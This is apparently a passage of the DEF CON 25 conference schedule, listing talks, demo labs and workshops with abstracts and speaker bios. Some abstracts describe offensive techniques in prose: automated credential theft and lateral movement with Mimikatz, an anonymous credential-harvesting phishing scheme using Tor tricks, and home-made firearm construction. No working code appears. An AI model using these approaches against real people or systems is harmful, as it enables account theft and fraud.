GODUMP-NG packet sniffing the Gotenna

Abstract

GoTenna is a wireless communication tool, popular for providing encrypted "off-the-grid" communications on unlicensed MURS channels. Using SDR, GNU Radio, and scapy we developed a tool to capture packets from all the channels simultaneously. This allowed us to characterize device behavior, study the packet protocol, and passively monitor communications. In this talk, we will explain our methodologies, demonstrate our tools live, and show how to perform link analysis: who is talking with whom, when, and how much.



Demolabs - Table 3 - Sunday - 10:00-11:50


GoFetch

Tal Maor

Sunday from 1000-1150 at Table Three

Audience: Enterprise, Applied Security, Windows domain, Defense and offense

GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application. The tool first loads a path of local admin users and computers generated by BloodHound and converts it to its own attack plan format. Once the attack plan is ready, it advances towards the destination according to the plan, step by step, by successively applying remote code execution techniques and compromising credentials with Invoke-Mimikatz, Mimikatz and Invoke-Psexec.

A video of the Python version was published here: https://www.youtube.com/watch?v=dPsLVE0R1Tg

A video of Invoke-GoFetch will be published soon.

BloodHound Application - https://github.com/BloodHoundAD/BloodHound

Tal Maor
Tal Maor is a Security Researcher at Microsoft who has a passion for creating tools which make life easier and more secure. Prior to Microsoft, Tal developed intelligence platforms at a leading company, and previously served in the IDF intelligence unit for four years. Tal holds a B.Sc. degree in Computer Science.



CHV - Village Talks Outside Contest Area, Pool Level - Saturday - 11:00-11:59


GPS System Integrity

No description available



CHV - Village Talks Outside Contest Area, Pool Level - Friday - 13:30-14:30


Grand Theft Radio (Stopping SDR Relay Attacks on PKES)

No description available



Demolabs - Table 3 - Saturday - 12:00-13:50


GreatFET

Dominic Spill

Michael Ossmann

Saturday from 1200-1350 at Table Three

Audience: Hardware & Offense

GreatFET is an open source hardware hacking platform. In addition to support for common protocols such as SPI, USB, JTAG, and UART, GreatFET also allows us to implement arbitrary protocols, as well as GPIO and acting as a logic analyser. Add-on boards, known as neighbors, allow us to build on the flexibility of GreatFET and rapidly create new tools. Example neighbors include radio platforms, software defined infrared transceivers, and interfaces for hardware hacking.

Hardware: https://github.com/greatscottgadgets/greatfet
Software/firmware: https://github.com/dominicgs/GreatFET-experimental

Dominic Spill
Dominic is a senior security researcher at Great Scott Gadgets, where he builds open source tools for reverse engineering communication protocols.

Michael Ossmann
Michael is a wireless security researcher who makes hardware for hackers. He founded Great Scott Gadgets in an effort to put exciting, new tools into the hands of innovative people.



ICS - Calibria - Saturday - 16:00-16:30


Title: Grid insecurity - and how to really fix this shit

You don’t need to be nation state backed, sophisticated, or even organized to take down the grid. Anyone can hack ICS/SCADA (even Donald Trump’s 400 pound guy sitting on his bed!). And the thing is, for years, we’ve been talking about finding 0-day in the grid, water treatment facilities, and other critical infrastructure. For the past ten or so years, con talks have focused on two things: all the fun 0-days, and the thousand products you should buy to be protected. But they never address the complexity of the actual problem. ICS is made up of endless numbers of components from just as many manufacturers – vulnerabilities are just the result of either incomplete systems design, or poor implementation. Most weaknesses are discovered at interfaces between software providers, coding languages, and system component boundaries; where vulnerabilities are introduced by the sum of all parts. Protecting ICS/SCADA is a systems level problem – and splitting it up into distinct pentests is not the solution. It means never solving the end-to-end issue, and ultimately cannibalizing an organization’s security budget by applying band-aids, instead of fixing the systemic issue.
This talk will not be another talk about how f*cked the problem is, instead it’ll reframe the issue as a systemic one, and talk about ways to fix it end-to-end.


Bio: Bryson Bort

Bryson is the Founder of GRIMM, a hacking firm for network, system, and embedded devices. He has a special interest in automotive, industrial control, SCADA, and embedded system security, and has been building over the past year a patent-pending platform approach to automated enterprise risk assessment based on offensive security, CROSSBOW™. Prior to founding GRIMM, Bryson led an elite offensive research & development division contributing directly to national security priorities. He is a West Point grad and did a stint with tanks (ask him why you’re a “crunchie”) and tactical communications. Twitter: @brysonbort @grimmcyber



Bio: Atlas

Atlas is a doer of stuff -- with proven expertise in programmatic reverse-engineering, automated vulnerability discovery and exploitation, and breaking into or out of anything related to a computer. Special hacking interests include exploiting automobiles, power systems and industrial control systems, locks, drones, or any other kind of embedded device. He’s a four-time DEFCON CTF winner and is always entertaining, educational, and fun. His day job includes breaking stuff at GRIMM. Twitter: @at1as @grimmcyber



Night Life - Octavius 5-8 - Saturday - 21:00-26:00


Title: GRIMM's AWESOME Arcade Party

The giant 16 person LED foosball tables are coming back to DEF CON! GRIMM is hosting an arcade party with tons of old school arcade games and great music. Come join the party!

Demolabs - Table 2 - Sunday - 12:00-13:50


Gumbler

Willis Vandevanter

Sunday from 1200-1350 at Table Two

Audience: Offense, AppSec

The tool searches the entire commit history of a Git project for secrets and files. This is a different approach from other tools, which focus on the current revision. It's excellent at digging up API keys, deleted usernames and passwords, or files that are now cloaked by .gitignore.

https://github.com/BuffaloWill/gumbler

Willis Vandevanter
Willis Vandevanter is a principal at Silent Robot Systems. Prior to SRS, Will was a Senior Researcher at Onapsis and Lead Penetration Tester at Rapid7. He has previously spoken at Blackhat, DEFCON, TROOPERS, and other conferences. In his spare time, he writes code and contributes to different projects.



SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 12:00-12:59


Title: Gun control - You can't put the Genie back into its bottle

1200 Friday
Michael E. Taylor, Attorney at Law
@mingheemouse

Michael E. Taylor, Attorney at Law, firearms law specialist and amateur gunsmith, will lead you through the futility of gun control by explaining how anyone, anywhere on the planet, can cheaply and easily assemble a fully functional firearm and make their own self-contained ammunition for that firearm, with simple hand tools, all using absolutely no firearm specific components. The technologies demonstrated herein are all public domain. All predate ITAR, with most dating back to the mid 19th century. The legality of personal firearm construction varies from jurisdiction to jurisdiction, so mind your local laws.


Night Life - Track 2 - Friday - 20:00-24:00


Title: Hacker Jeopardy

Night Life - Track 2 - Saturday - 20:00-24:00


Title: Hacker Jeopardy

Night Life - Roman 1, Promenade Level - Friday - 20:00-26:00


Title: Hacker Karaoke

Our 9th year! Celebrate with us and with others who love to sing. Do you like music? Do you like performances? Want to BE the performer? Want to have that "hold my beer" moment, do your best and not get injured? Well, trot your happy ass down to Hacker Karaoke, DEF CON's on-site karaoke experience. You can be a star, or if you don't want to be a star, you can also take pride in making an utter fool of yourself.

Night Life - Roman 1, Promenade Level - Saturday - 20:00-26:00


Title: Hacker Karaoke

Our 9th year! Celebrate with us and with others who love to sing. Do you like music? Do you like performances? Want to BE the performer? Want to have that "hold my beer" moment, do your best and not get injured? Well, trot your happy ass down to Hacker Karaoke, DEF CON's on-site karaoke experience. You can be a star, or if you don't want to be a star, you can also take pride in making an utter fool of yourself.

SEV - Emperors BR II - Friday - 18:25-19:15



Friday July 28 6:25PM 50 mins

Hackers gonna hack – But do they know why?
Previous academic studies have investigated the psychological aspects of information security, but the focus has been on social engineering or attempts to define hacker characteristics/motivations. This neglects the wider social psychological processes that influence everyone who takes part in online communities. These processes are important; they determine how we understand, perceive and interact with the members of our own group and the groups around us. What is especially notable from social psychological research are the many mistakes people make in trying to interpret those around us, mistakes which can lead to underestimating risk or creating unnecessary tensions.

This talk will explore how social psychological research should be used to improve understanding of all the groups who may be involved in an information security incident. Regardless of how much of an anarchist or rebel we might be, it will be discussed how individuals are strongly influenced by the norms and identity of their group – and whether this is a good thing or not.

Helen Thackaray: @hel_ty
Helen is a PhD candidate at Bournemouth University (UK). The work presented in this talk is part of research for the doctoral thesis. Despite having qualifications in neither, she is based in the departments of Psychology and Computing. She spends most of her time on different internet forums and still finds it amazing that the university pays her to do this. Her research aims to examine group identity and group processes online, highlight the importance of social psychology in information security, and further education about informed decision making online.



DEFCON - Track 4 - Friday - 12:00-12:45


Hacking Democracy: A Socratic Dialogue

Friday at 12:00 in Track 4

45 minutes

Mr. Sean Kanuck Stanford University, Center for International Security and Cooperation

In the wake of recent presidential elections in the US and France, "hacking" has taken on new political and social dimensions around the globe. We are now faced with a world of complex influence operations and dubious integrity of information. What does that imply for democratic institutions, legitimacy, and public confidence?

This session will explore how liberal democracy can be hacked — ranging from direct manipulation of electronic voting tallies or voter registration lists to indirect influence over mass media and voter preferences — and question the future role of "truth" in open societies. Both domestic partisan activities and foreign interventions will be considered on technical, legal, and philosophical grounds. The speaker will build on his experience as an intelligence professional to analyze foreign capabilities and intentions in the cyber sphere in order to forecast the future of information warfare. Audience members will be engaged in a Socratic dialogue to think through how modern technologies can be used to propagate memes and influence the electorate. The feasibility of, and public policy challenges associated with, various approaches to hacking democracy will also be considered. This conceptual discussion of strategic influence campaigns will not require any specific technical or legal knowledge.

Mr. Sean Kanuck
Sean Kanuck is an attorney and strategic consultant who advises governments, corporations, and entrepreneurs on the future of information technology. Sean is affiliated with Stanford University's Center for International Security and Cooperation and has received several international appointments, including: Chair of the Research Advisory Group for the Global Commission on the Stability of Cyberspace (Hague, Netherlands), Distinguished Visiting Fellow at Nanyang Technological University (Singapore), and Distinguished Fellow with the Observer Research Foundation (New Delhi, India). He regularly gives keynote addresses for global audiences on a variety of cyber topics, ranging from risk analysis to identity intelligence to arms control.

Sean served as the United States' first National Intelligence Officer for Cyber Issues from 2011 to 2016. He came to the National Intelligence Council after a decade of experience in the Central Intelligence Agency's Information Operations Center, including both analytic and field assignments. In his Senior Analytic Service role, he was a contributing author for the 2009 White House Cyberspace Policy Review, an Intelligence Fellow with the Directorates for Cybersecurity and Combating Terrorism at the National Security Council, and a member of the United States delegation to the United Nations Group of Governmental Experts on international information security.

Prior to government service, Sean practiced law with Skadden Arps in New York, where he specialized in mergers and acquisitions, corporate finance, and banking matters. He is admitted to the bar in New York and Washington DC, and his academic publications focus on information warfare and international law. Sean holds degrees from Harvard University (A.B., J.D.), the London School of Economics (M.Sc.), and the University of Oslo (LL.M.). He also proudly serves as a Trustee of the Center for Excellence in Education, a charity promoting STEM education that is based in McLean, Virginia.

@seankanuck



DEFCON - Capri Room - Friday - 20:00-21:59


Hacking Democracy

Friday at 20:00 - 22:00 in Capri Room

Evening Lounge

Mr. Sean Kanuck Stanford University, Center for International Security and Cooperation

Are you curious about the impact of fake news and influence operations on elections? Are you concerned about the vulnerability of democratic institutions, the media, and civil society? Then come engage with your peers and the first US National Intelligence Officer for Cyber Issues on ways to hack democracy. He will: (1) provide a low-tech, strategic analysis of recent events, foreign intelligence threats, and the future of information warfare; (2) lead a Socratic dialogue with attendees about the trade-offs between national security and core democratic values (such as freedom, equality, and privacy); and (3) open the floor to audience questions and/or a moderated group debate.

This session is intended to be informal and participatory. It will cover a range of issues from supply chain attacks on voting machines to psychological operations by using an interdisciplinary approach that encompasses constitutional law, world history, game theory, social engineering, and international affairs. The discussion will occur against the backdrop of cyber security and critical infrastructure protection, but it will not examine any specific hardware or software systems; rather, it will concern the conceptual formulation and conduct of modern strategic influence campaigns. No specific knowledge is required, but a skeptical mind and mischievous intellect are a must.

Mr. Sean Kanuck
Sean Kanuck is an attorney and strategic consultant who advises governments, corporations, and entrepreneurs on the future of information technology. Sean is affiliated with Stanford University's Center for International Security and Cooperation and has received several international appointments, including: Chair of the Research Advisory Group for the Global Commission on the Stability of Cyberspace (Hague, Netherlands), Distinguished Visiting Fellow at Nanyang Technological University (Singapore), and Distinguished Fellow with the Observer Research Foundation (New Delhi, India). He regularly gives keynote addresses for global audiences on a variety of cyber topics, ranging from risk analysis to identity intelligence to arms control.

Sean served as the United States' first National Intelligence Officer for Cyber Issues from 2011 to 2016. He came to the National Intelligence Council after a decade of experience in the Central Intelligence Agency's Information Operations Center, including both analytic and field assignments. In his Senior Analytic Service role, he was a contributing author for the 2009 White House Cyberspace Policy Review, an Intelligence Fellow with the Directorates for Cybersecurity and Combating Terrorism at the National Security Council, and a member of the United States delegation to the United Nations Group of Governmental Experts on international information security.

Prior to government service, Sean practiced law with Skadden Arps in New York, where he specialized in mergers and acquisitions, corporate finance, and banking matters. He is admitted to the bar in New York and Washington DC, and his academic publications focus on information warfare and international law. Sean holds degrees from Harvard University (A.B., J.D.), the London School of Economics (M.Sc.), and the University of Oslo (LL.M.). He also proudly serves as a Trustee of the Center for Excellence in Education, a charity promoting STEM education that is based in McLean, Virginia.

@seankanuck


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 1 - Saturday - 14:30-18:30


Hacking Network Protocols using Kali

Saturday, 14:30 to 18:30 in Octavius 1

Thomas Wilhelm Security Solutions Expert, HP Inc.

John Spearing

There are a lot of hacking tutorials on how to compromise servers, but what about network devices? In this workshop, we will demonstrate how to conduct penetration tests against a number of different network protocols, specifically those at layers 2 and 3 of the OSI model, in order to assess and circumvent the security of an organization. Participants will be able to watch a demonstration of how to leverage insecurities in different protocols, and replicate the attacks themselves in a lab environment at the workshop. In addition, we will discuss what steps network engineers can take to limit these insecurities.
This workshop will include network devices to which participants will be able to connect and perform the demonstrated attacks. Participation will be limited since network equipment resources are scarce, unless additional lab equipment can be procured.

Prerequisites: Since the subject matter discusses network protocols, it is required for students to understand the OSI model and specifics of well-known network protocols, particularly those found at layer 2 and layer 3 of the OSI model.

Materials: Since this is an advanced penetration testing subject, participants should have a laptop with an up-to-date Kali Linux image. In addition, if they want to participate in actual network protocol attacks, they should bring CAT5 cables for connectivity. This class will not spend time getting students online - participants should already be familiar with configuring static IP addresses and/or DHCP for their systems. Because participants will be able to connect to a lab environment with active exploits, it is suggested that students use a computer system that can be easily re-imaged at the end of the workshop.

Max students: 32 | Registration: https://dc25_wilhelm.eventbrite.com/ (Sold out!)

Thomas Wilhelm
Thomas Wilhelm has been an associate professor at an NSA CAE university, where he taught information assurance for many years at both the master's and undergraduate level. He has been a penetration tester and team lead for Fortune 100 companies, and has spent the last 20+ years involved in information security. Thomas has written numerous articles and books over the years on hacking; the latest is titled "Professional Penetration Testing (vol 2)," published by Syngress, which has been printed in multiple languages. Thomas holds two master's degrees (MSCS, MSM) and maintains the following certifications: ISSMP, CISSP, CCNP Security, SCSECA, SCNA, SCSA, IEM, IAM.

John Spearing
John Spearing works in the field of network and physical security, and holds master's degrees in both Computer Science and Organizational Behavior. John is the co-founder and Operations Manager of the MSSP Crystal Defense Network Information Security, located in central Colorado. John's specialty within the information security realm centers on network intrusion detection and prevention, as well as endpoint security.


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Friday - 10:30-11:00


Title:
Hacking on Multiparty Computation

Name:
Matt Cheung

Abstract:
Secure multiparty computation is about jointly computing a function while keeping each party's inputs secret. This comes off as an esoteric area of cryptography, but the goal of this talk is to introduce you to the core concepts through a history of the topic. I will conclude by demoing an implementation of an example protocol I implemented.

Bio:
Matt Cheung started developing his interest in cryptography during an internship in 2011. He worked on the implementation of a secure multi-party protocol by adding elliptic curve support to an existing secure text pattern matching protocol. From this experience he has given talks and workshops at the Boston Application Security Conference and the DEF CON Crypto and Privacy Village.
Twitter handle of presenter(s): nullpsifer

Return to Index      -     

 

DEFCON - Track 3 - Friday - 11:00-11:45


Hacking Smart Contracts

Friday at 11:00 in Track 3

45 minutes | Demo

Konstantinos Karagiannis Chief Technology Officer, Security Consulting, BT Americas

It can be argued that the DAO hack of June 2016 was the moment smart contracts entered mainstream awareness in the InfoSec community. Was the hope of taking blockchain from a mere cryptocurrency platform to one that can perform amazing Turing-complete functions doomed? We've learned quite a lot from that attack against contract code, and Ethereum marches on. Smart contracts are a key part of the applications being created by the Enterprise Ethereum Alliance, Quorum, and smaller projects in financial and other companies. Ethical hacking of smart contracts is a critical new service that is needed. And as is the case with coders of Solidity (the language of Ethereum smart contracts), hackers able to find security flaws in the code are in high demand.

Join Konstantinos for an introduction to a methodology that can be applied to Solidity code review ... and potentially adapted to other smart contract projects. We'll examine the few tools that are needed, as well as the six most common types of flaws, illustrated using either public or sanitized "real world" vulnerabilities.

Konstantinos Karagiannis
Konstantinos Karagiannis is the Chief Technology Officer for Security Consulting at BT Americas. In addition to guiding the technical direction of ethical hacking and security engagements, Konstantinos specializes in hacking financial applications, including smart contracts and other blockchain implementations. He has spoken at dozens of technical conferences around the world, including Black Hat Europe, RSA, and ISF World Security Congress.

@konstanthacker


Return to Index      -     

 

Wireless - Florentine BR I & II - Promenade Level - Friday - 12:00-13:25


Balint Seeber

Bio

A software engineer by training, Balint is a perpetual hacker, the Director of Vulnerability Research at Bastille Networks, and the guy behind spench.net. His passion is Software Defined Radio and discovering all that can be decoded from the ether, as well as extracting interesting information from lesser-known data sources and visualising it in novel ways. When not receiving electromagnetic radiation, he likes to develop interactive web apps for presenting spatial data. Originally from Australia, he moved to the United States in 2012 to pursue his love of SDR as the Applications Specialist and SDR Evangelist at Ettus Research.

@spenchdotnet

Hacking Some More of The Wireless World

Abstract

The hacking continues on from last year! Three interesting applications will be demonstrated, and their underlying theory and design explained. The audience will be exposed to some novel GNU Radio tips and DSP tricks. INMARSAT Aero will be revisited to show (in Google Earth) spatial information, such as waypoints and flight plans, that are transmitted from airline ground operations to airborne flights. A good chunk of the VHF band is used for airline communications; plane spotters enjoy listening to tower and cockpit communications. Modern SDRs can now sample the entire band, and as AM modulation is used, it's possible to use a counterintuitive, but simple, demodulator chain (first shown by Kevin Reid's wideband 'un-selective AM' receiver) to listen to the most powerful transmission. This will be demonstrated with a GNU Radio-based implementation. It is also possible to 'spatialise' the audio for the listener using stereo separation, which can convey a transmission's relative position on the spectrum. FMCW RADAR experiments are enhanced to include Doppler processing. Plotting this new velocity information, due to the Doppler effect, shows whether a target is heading toward or away from you, and often reveals targets not normally seen in range-only information - this demonstrates the true power of full RADAR signal processing. This technique will be applied to the live audio demo, a new live SDR demo, CODAR ocean current tracking, and passive RADAR exploiting powerful ATSC digital television signals (this was used to track aircraft on approach across the Bay Area).


Return to Index      -     

 

DEFCON - Track 1 - Thursday - 14:00-14:45


Hacking the Cloud

Thursday at 14:00 in 101 Track

45 minutes | Demo

Gerald Steere Cloud Wrecker, Microsoft

Sean Metcalf CTO, Trimarc

You know the ins and outs of pivoting through your target's domains. You've had the KRBTGT hash for months and laid everything bare. Or have you?

More targets today have some or all of their infrastructure in the cloud. Do you know how to follow once the path leads there? Red teams and penetration testers need to think beyond the traditional network boundaries and follow the data and services they are after. This talk will focus on how to take domain access and leverage internal access as a ticket to your target's cloud deployments.

We will also discuss round trip flights from cloud to on-premises targets and what authorizations are required to access your target's cloud deployments. While this talk is largely focused on Microsoft Azure implementations, the concepts can be applied to most cloud providers.

Gerald Steere
Gerald Steere has been a member of the C+E Red Team since joining Microsoft in June 2014. He regularly dives into the deepest corners of Azure looking for vulnerabilities unique to the cloud scale environment and collecting all the creds. Prior to that, he was a security auditor and penetration tester for three civilian Federal agencies, where he acquired a love for obtaining and cracking as many passwords as possible. He has spoken on cloud security topics at multiple BlueHat events and most recently at BSides Seattle.

@darkpawh

Sean Metcalf
Sean Metcalf is founder and principal consultant at Trimarc Security, LLC (www.TrimarcSecurity.com), which focuses on mitigating, detecting, and when possible, preventing modern attack techniques. He is one of about 100 people in the world who holds the Microsoft Certified Master Directory Services (MCM) certification, is a Microsoft MVP, and has presented on Active Directory attack and defense at BSides, Shakacon, Black Hat, DEF CON, and DerbyCon security conferences.

Sean has provided Active Directory and security expertise to government, corporate, and educational entities since Active Directory was released. He currently provides security consulting services to customers and regularly posts interesting Active Directory security information on his blog, ADSecurity.org.

@pyrotek3


Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 18:00-18:59


Title:
Hacking the Law: A Call for Action - Bug Bounties' Legal Terms as a Case Study

1800 Friday
Amit Elazari
@amitelazari

While the bug bounty economy is booming, a novel survey of bug bounty terms reveals that platforms and companies often put hackers in legal harm's way, shifting the risk for civil and criminal liability towards hackers instead of authorizing access and creating safe harbors. This is a call for action to hackers to unite, negotiate and influence the emerging landscape of cyberlaw, since hackers' actions speak louder than scholars' words. I suggest simple steps that could and should be taken in order to minimize the legal risks of thousands of hackers participating in bug bounties, and create a rise-to-the-top competition over the quality of bug bounty terms. Hackers will learn not only which terms they should beware of in light of recent developments in anti-hacking laws, but which terms they, individually and through the platform, should demand to see to ensure authorized access. Most importantly, this is a case study of how a united front of hackers could demand and negotiate important rights, similar to what is done by organizations in other industries. Contracts and laws will continue to play a role in the highly regulated cyber landscape, and conflicts of interest will inevitably arise; therefore hackers should not only pay attention to the fine print, but unite and negotiate for better terms.

Return to Index      -     

 

BHV - Pisa Room - Saturday - 10:30-10:59


Title: Hacking the Second Genetic Code using Information Theory

Speakers: Travis Lawrence

About Travis:
Travis Lawrence is currently a PhD candidate in Quantitative and Systems Biology at University of California, Merced. He developed an interest in both biodiversity and computers early in life. During college, he stumbled into the field of evolutionary biology which allowed him to pursue his interests in computer programming and biodiversity. The questions that are of the most interest to him are at the interface of evolutionary biology, genomics and bioinformatics.


Abstract:
Recent advances in genome editing have quickly turned ideas thought restricted to science fiction into reality, such as custom synthetic organisms and designer babies. These technologies rely on the fidelity of the genetic code, which translates nucleotides into proteins. The underlying mechanism of translation is well understood: triplets of nucleotides, known as codons, are recognized by transfer RNAs with complementary nucleotide triplets. These transfer RNAs carry one of twenty amino acids, which are then added to the growing protein chain by the ribosome. However, relatively little work has examined how a transfer RNA that recognizes a certain codon always carries the correct amino acid. The rules that determine which amino acid a transfer RNA carries have been termed the second genetic code. I have developed a computational method based on information theory that can elucidate the second genetic code from genomic sequences. Interestingly, the second genetic code is highly variable between organisms, unlike the genetic code, which is relatively static. I will present how my method cracks the second genetic code and how the variability of the second genetic code can be exploited to develop new treatments to combat bacterial infections and parasites, create targeted bio-controls to combat invasive species, and expand the genetic code to incorporate exotic amino acids.



Return to Index      -     

 

DEFCON - Track 2 - Friday - 10:20-10:40


Hacking travel routers like it's 1999

Friday at 10:20 in Track 2

20 minutes | Demo, Exploit

Mikhail Sosonkin Security Researcher, Synack Inc.

Digital nomads are a growing community and they need internet safety just like anyone else. Trusted security researchers have warned about the dangers of traveling through AirBnBs. Heeding their advice, I purchased a HooToo TM06 travel router to create my own little enclave while I bounce around the globe. Being a researcher myself, I did some double checking.

So, I started fuzzing and reverse engineering. While the TM06 is a cute and versatile little device, protection against network threats it is not. In this talk, I will take you on my journey, revealing my methodology for discovering and exploiting two memory corruption vulnerabilities. The vulnerabilities are severe and, while they've been reported to the vendor, they are very revealing data points about the security state of such devices. While the device employs some exploitation mitigations, many are missing. I will be showing how I was able to bypass them and what mitigations should've been employed, such as NX stack/heap, canaries, etc., to prevent me from gaining arbitrary shellcode execution.

If you’re interested in security of embedded/IoT systems, travel routers or just good old fashioned MIPS hacking, then this talk is for you!

Mikhail Sosonkin
Mikhail Sosonkin is a Security Researcher at Synack, where he digs into the security aspects of low-level systems. He enjoys automating aspects of reverse engineering and fuzzing in order to better understand application internals. Mikhail has a CS degree from NYU, where he has also taught Application Security, and a Software Engineering master's from Oxford University. Being a builder and a hacker at heart, his interests are in vulnerability analysis, automation, malware and reverse engineering. Mikhail very much enjoys speaking at conferences such as ZeroNights in Moscow and DEF CON in Las Vegas!

@hexlogic, Blog http://debugtrap.com/


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 7 - Saturday - 14:30-18:30


Harnessing the Power of Docker and Kubernetes to Supercharge Your Hacking Tactics

Saturday, 14:30 to 18:30 in Octavius 7

Anshuman Bhartiya

Anthony Bislew Red Teamer, Intuit

Running reconnaissance on a target network is almost always time-consuming and cumbersome. For experienced hackers, the process of manually enumerating and scanning target networks comes to feel like a gratuitous journey through Mordor on our way to the glory of shells, pivoting, and pilfering. Even worse, most of the automated reconnaissance solutions out there are expensive, limited in their effectiveness, opaque in their functionality...or all of the above.

What if you could automate your own customized approach to reconnaissance and exploitation by leveraging an entirely free and open-source framework to
1. Integrate the tools you trust and
2. Build tools of your own to capture those tricks that are unique to the special snowflake that is you?

In this workshop, we'll introduce you to the power of Docker and Kubernetes to supercharge your hacking tactics. We'll walk you through the process of building your tools as Docker images, scheduling and launching those tools in a Kubernetes cluster, and storing your results in a way that's easy to analyze and act upon. We'll spawn and destroy some attack environments and show how easy it is to do your testing without stressing out about how to get started. We'll even use some of the recon results to automate running exploitation tools against them and getting to the keys of the kingdom! By the end of this workshop you should have all the tools you need to build and extend your own recon and exploitation framework that is supercharged and hyper-scalable, thanks to Kubernetes.

Prerequisites: Attendees should be:
Comfortable using a MacOS/Linux shell terminal
Comfortable enough with a common scripting language (preferably Python/Ruby) to write simple tools/scripts
Familiar with command-line tools common to security professionals (e.g. curl, Nmap, etc.)
Familiar with Docker (e.g. its purpose, the concepts of containers and images, etc.)
https://www.docker.com/

Familiar with Google Cloud Platform offerings (e.g. Compute Engine, Container Engine, Storage, BigQuery, etc.)
https://cloud.google.com/

A basic knowledge of Kubernetes is extremely helpful but not required. https://kubernetes.io/

Materials:
• Laptop with a Linux-based OS (preferably Mac/Ubuntu)
• A Google Cloud Platform (GCP) account - You can use the GCP Free Tier to get one. They give $300 worth of free credits which is more than enough.
• https://cloud.google.com/free/
• A Slack account configured with an incoming webhook - https://api.slack.com/incoming-webhooks
• An IDE such as Atom or Visual Studio Code.
• We will walk through installation of any other tools/software necessary such as Docker, Minikube, Google SDK, Golang, Python, etc. so you don’t have to have these pre-installed but it would help if you do.

Max students: 60 | Registration: https://dc25_bhartiya.eventbrite.com (Sold out!)

Anshuman Bhartiya
Anshuman Bhartiya has been in the IT industry for about 10 years now and has had the opportunity to wear multiple hats. Anshuman has been a web developer, cloud consultant, systems engineer and security engineer, to name a few. Anshuman has a varied skill set and he likes to tinker with the latest technology, coming up with innovative solutions for difficult and challenging problems. Security, automation and innovation are some of the things he is really passionate about, and he firmly believes in sharing knowledge and in the open source community. You can find some of Anshuman's work on his GitHub: https://github.com/anshumanbh

Anthony Bislew
Anthony Bislew is a red teamer for the Intuit security team, with 17 prior years of experience in the IT industry. He was the co-founder of two Infrastructure as a Service (IaaS) startups and architected multiple data centers from the ground up. He is a co-founder of SD Hackers, a San Diego-based group of security professionals that come together to learn from and collaborate with each other. He is also the creator of the public penetration testing lab Infoseclabs, which was recently converted into a private security research lab for local San Diego penetration testers and researchers.


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Saturday - 14:00-15:00


Title:
Have you seen my naked selfies? Neither has my snoopy boyfriend. Privacy within a Relationship

Author:
Lauren Rucker

Abstract:
Privacy is fairly cut and dry when it's US versus THEM, but what if it's ME versus YOU within US? What are YOUR privacy rights, in the context of OUR relationship? Am I your non-trusting girlfriend? Am I your controlling boyfriend? Am I your snooping wife? Am I your abusive husband? How do YOU protect your privacy from ME? I will be providing tips, techniques, and resources to enable someone (anyone, even YOU) to protect their privacy in a relationship, perhaps even one with ME.

Highlights will include ways you can be surveilled, at home techniques you can use to protect yourself when using your phone and computer, and individual privacy rights within a marriage. Presented by someone who may have needed the information, and had to discover this path themselves, and is zealous about assisting those in need of this talk. Even YOU.

Bio:
Lauren Rucker is a threat intelligence analyst for NASA, with experience in threat assessment, vulnerability analysis, risk assessment, information gathering, correlation and reporting. Lauren is a former military intelligence officer who served at U.S. Cyber Command and U.S. Strategic Command. She is currently a graduate student earning her master's in cybersecurity and is passionate about making cybersecurity practices relatable to the average internet user.
Twitter handle of presenter(s): @laurenkrucker

Return to Index      -     

 

BHV - Pisa Room - Friday - 14:30-14:59


Title: Health as a service...

Speakers: Julian Dana

About Julian:
Julian is a security consultant with more than 20 years of experience. He has experience in hands-on security testing and also in teaching various technical security trainings. Julian, as a frustrated doctor, has always been passionate and curious about the human body.

Abstract:
The software as a service (SaaS) model is the same model that we are using for our health... Unbelievable: we are treating symptoms and not curing diseases...



Return to Index      -     

 

SEV - Emperors BR II - Friday - 20:10-20:40


Friday July 28 8:10PM 30 mins

Heavy Diving for Credentials: Towards an Anonymous Phishing
Online phishing campaigns are one of the most typical social engineering exercises that can be conducted on the internet. In spite of the ease with which fake websites can be deployed using tools such as the Social Engineering Toolkit, attackers will sometimes be limited by the difficulty of achieving a sufficient degree of privacy should they be caught. Thus, finding a set of platforms that can provide this anonymity and untraceability is needed to launch similar campaigns with the minimum guarantees of remaining safe.

In this session, the authors will show a proposal on how to perform this type of attack, with the example of credential harvesting in mind, by using some of the well-known capabilities that the Tor ecosystem provides. During the conference, some demos will be conducted in which our baits will be prepared to be bitten even by users who are not using Tor-ified browsers, by adding some simple tricks that include the exploitation of the target="_blank" directive, the particular use of .onion subdomains in current browsers and a combination of third-party gateways to maximize the chances of deceiving the victim while the attacker remains as anonymous as possible.

Yaiza Rubio: @yrubiosec
Félix Brezo: @febrezo
Yaiza Rubio is an intelligence analyst with a Bachelor of Information Sciences, Master in Intelligence Analysis, Master in Logistics and Economics of Defense and Master in Law Applied to Internet and TIC. A member of the Institute of Forensic Science and Security of the Autonomous University of Madrid and a former analyst at S21sec and Isdefe, she has served as an intelligence analyst for Eleven Paths since May 2013. She is a collaborator of the Centre of Analysis and Foresight of the Spanish Guardia Civil as well as a recurrent trainer for national and international law enforcement agencies such as Europol, the Spanish Army and several police units in Spain. She also teaches in several postgraduate courses on intelligence analysis, security and open source intelligence, and publishes scientific and technical content at hacking and security-related conferences like RootedCon, NavajaNegra, 8dot8, JNIC, ISACA and many others. In May 2017, she was awarded the honorific title of Cybercooperant by the Spanish Ministry of Digital for her work on spreading cybersecurity awareness.

Félix Brezo is an intelligence analyst with a degree in Computer Engineering and Industrial Organisation Engineering, a Master in Information Security, a Master in Intelligence Analysis, a Master in Law Applied to Internet and TICs and a PhD in Computer Engineering and Telecommunications. Until June 2013 he was a researcher in computer security at the S3Lab run by the University of Deusto; since then he has been an intelligence analyst for Eleven Paths and a collaborator of the Spanish Guardia Civil's Centre of Analysis and Foresight, as well as a recurrent trainer for law enforcement agencies in Spain and Europe. He teaches on intelligence analysis and security in several postgraduate courses and is also a recurrent lecturer at hacking and security-related conferences like RootedCon, NavajaNegra, 8dot8, JNIC or ISACA, amongst many others.

Both authors have been leading the development of OSRFramework, a free software information gathering framework focused on analysts, which has received up to 4 different national awards in Spain for the assistance it provides to the fingerprinting phase in hacking and intelligence operations.


Return to Index      -     

 

DEFCON - Track 1 - Saturday - 17:00-17:45


Here to stay: Gaining persistency by abusing advanced authentication mechanisms

